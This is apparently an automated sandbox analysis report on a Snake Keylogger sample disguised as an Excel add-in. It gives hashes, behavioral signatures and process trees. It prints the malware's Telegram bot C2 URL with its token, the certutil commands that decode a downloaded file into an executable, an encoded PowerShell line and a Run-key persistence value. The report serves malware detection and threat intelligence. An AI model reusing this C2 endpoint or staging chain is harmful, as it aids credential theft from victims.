Analysis
-
Max time kernel: 137s
Max time network: 140s
Platform: windows10-2004_x64
Resource: win10v2004-20220414-en
Submitted: 04-07-2022 18:06
Static task: static1
Behavioral task: behavioral1
  Sample: MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
  Resource: win10v2004-20220414-en
General
-
Target: MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
Size: 1.7MB
MD5: e772d046be7fbfbe96e90eca5ab20566
SHA1: 286d9bcf13c0cb309f9041f2ea03e5ce99848669
SHA256: 92c7146dd4dd24206b2c0b9dee831bdd772eced8b8d5c67b3b73e31bababea82
SHA512: 4c79623f6c7c557169da85715e69f387ef2d98a16ab35516768ef921e65e791d1301d2574a6703b1e7c9fb6902d69bef341908294ba31469e57321533de70103
Malware Config
-
Extracted
Family: snakekeylogger
C2 URL: https://api.telegram.org/bot1707668650:AAFJBUcmT6aGlXwy3-beDARhm0ji930DCzM/sendMessage?chat_id=-772314354
Signatures
-
Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1188 | 3568 | cmd.exe | EXCEL.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 3104 | 3568 | cmd.exe | EXCEL.EXE
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger Payload (1 IoC)
Processes:
  resource | yara_rule
  behavioral2/memory/1600-167-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Downloads MZ/PE file
-
Executes dropped EXE (1 IoC)
Processes:
  pid | process
  1324 | appBQQRFLOQKX.txt.exe
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | appBQQRFLOQKX.txt.exe
-
Loads dropped DLL (2 IoCs)
Processes:
  pid | process
  3568 | EXCEL.EXE
  3568 | EXCEL.EXE
-
Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | InstallUtil.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | InstallUtil.exe
  Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | InstallUtil.exe
-
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rrfta = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hbxhwj\\Rrfta.exe\"" | appBQQRFLOQKX.txt.exe
-
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  35 | checkip.dyndns.org
-
Suspicious use of SetThreadContext (1 IoC)
Processes:
  description | pid | process | target process
  PID 1324 set thread context of 1600 | 1324 | appBQQRFLOQKX.txt.exe | InstallUtil.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
-
Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid | process
  3568 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid | process
  3956 | powershell.exe
  3956 | powershell.exe
  1324 | appBQQRFLOQKX.txt.exe
  1324 | appBQQRFLOQKX.txt.exe
  1600 | InstallUtil.exe
-
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 3568 | EXCEL.EXE
  Token: SeDebugPrivilege | 1324 | appBQQRFLOQKX.txt.exe
  Token: SeDebugPrivilege | 3956 | powershell.exe
  Token: SeDebugPrivilege | 1600 | InstallUtil.exe
-
Suspicious use of SetWindowsHookEx (12 IoCs)
Processes:
  pid | process
  3568 | EXCEL.EXE (12 identical entries)
-
Suspicious use of WriteProcessMemory (22 IoCs)
Processes:
  description | pid | process | target process | count
  PID 3568 wrote to memory of 1188 | 3568 | EXCEL.EXE | cmd.exe | 2
  PID 1188 wrote to memory of 4016 | 1188 | cmd.exe | certutil.exe | 2
  PID 3568 wrote to memory of 3104 | 3568 | EXCEL.EXE | cmd.exe | 2
  PID 3104 wrote to memory of 3056 | 3104 | cmd.exe | certutil.exe | 2
  PID 3568 wrote to memory of 1324 | 3568 | EXCEL.EXE | appBQQRFLOQKX.txt.exe | 3
  PID 1324 wrote to memory of 3956 | 1324 | appBQQRFLOQKX.txt.exe | powershell.exe | 3
  PID 1324 wrote to memory of 1600 | 1324 | appBQQRFLOQKX.txt.exe | InstallUtil.exe | 8
-
outlook_office_path (1 IoC)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | InstallUtil.exe
-
outlook_win_path (1 IoC)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | InstallUtil.exe
Processes
-
[1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll"
    - Loads dropped DLL
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
-
    [2] C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd.exe" /C certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsx
        - Process spawned unexpected child process
        - Suspicious use of WriteProcessMemory
-
        [3] C:\Windows\system32\certutil.exe
            Command line: certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsx
-
    [2] C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd.exe" /C certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe &
        - Process spawned unexpected child process
        - Suspicious use of WriteProcessMemory
-
        [3] C:\Windows\system32\certutil.exe
            Command line: certutil -decode C:\Users\Admin\Downloads\appBQQRFLOQKX.txt C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe
-
    [2] C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe
        Command line: "C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
-
        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
-
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            - Accesses Microsoft Outlook profiles
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MV. NEW BRIDGE (EX THORCO SVENDBORG)..xll
  Filesize: 1.7MB
  MD5: e772d046be7fbfbe96e90eca5ab20566
  SHA1: 286d9bcf13c0cb309f9041f2ea03e5ce99848669
  SHA256: 92c7146dd4dd24206b2c0b9dee831bdd772eced8b8d5c67b3b73e31bababea82
  SHA512: 4c79623f6c7c557169da85715e69f387ef2d98a16ab35516768ef921e65e791d1301d2574a6703b1e7c9fb6902d69bef341908294ba31469e57321533de70103
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt
  Filesize: 24KB
  MD5: fbefbe8ae4a09ba8018b2d7ff9143f3e
  SHA1: c03cd7561d6a64f754c65bda8faa5a434eb04e0b
  SHA256: 881a15d10e000d20b2179290d340e1234f46301569f19e34fe06f82f37cb32c8
  SHA512: 490167845d6930e10339e83a5e60181e78a718b8975eccb6bb104467020b4fd4b080be20e463e5bfe681549e843999a2b90b3f48db737229e8a0bdc198af7189
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt
  Filesize: 58B
  MD5: 759d88148f2999ed1b1db44c9b1be24d
  SHA1: 6a427759e0dfb9ebc2826a239dd3c7ffb2d39a36
  SHA256: 22a3bb08dd922fa426a32104fb211b5b6897f286913f74e349c55dcec45e307c
  SHA512: 0b3c1cbc98c7f6839b7654f80037e5efd0ea06a62ef3afb52423d27cd283aee4b844befed5fb0f1f65f89fe472a455a255f911e9a296206758e53666fdd5d852
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.exe
  Filesize: 174KB
  MD5: 29e69c25d02c5a45e62f038f7aa7a716
  SHA1: 9aa09cd4c4126cd410a2674a37d34d1d7575d8b0
  SHA256: cb191c1c612b01447bd75c880c223fa73c82f9902bc6e6a26881031b0a9bf9db
  SHA512: b626b753d4e9daf4ab42e0fe00213600a12874822703c7d7c9fb6a2c8548885ad6f30b341c317780146ac5c7dacf11331071cc721c0cc9a411c4386dc6ee00e9
-
C:\Users\Admin\Downloads\appBQQRFLOQKX.txt.xlsx
  Filesize: 18KB
  MD5: aea065e068a1c885c5c82b9da16de628
  SHA1: f6c1af23d9e30b77160bf0da4f56eaef94d853c1
  SHA256: fcd49a887692286cd815e911fd667f9323152c4d13e37020f065aabd023ab0ca
  SHA512: 092247866bca90694c95e7d1db658baba7fd88c192fd8e2c132de896541b3a09b74b17055022dbb03789814a0a31c3ae57072e6ef6f3c88f2cd23c0ca8275c8a